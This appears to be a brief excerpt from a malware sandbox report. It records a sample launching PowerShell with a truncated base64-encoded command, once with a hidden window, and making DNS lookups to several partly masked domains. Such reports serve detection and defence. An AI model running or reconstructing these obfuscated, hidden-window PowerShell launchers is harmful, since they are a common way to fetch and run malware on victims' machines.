Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGoAdwBxAGEAZQBvAGUAcQA9ACcAUQBvAG8AeQBtAGkAbAB3AGsAJwA7ACQAQwBxAG0AcABjAHYAYQBvAHAAIAA9ACAAJwA4AD...
- DNS ASK to####rts24.live
- DNS ASK pr#####dregistry.com
- DNS ASK di###our.top
- DNS ASK ec###dpak.co.uk
- DNS ASK so####ongkhoe.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGoAdwBxAGEAZQBvAGUAcQA9ACcAUQBvAG8AeQBtAGkAbAB3AGsAJwA7ACQAQwBxAG0AcABjAHYAYQBvAHAAIAA9ACAAJwA4AD...' (with hidden window)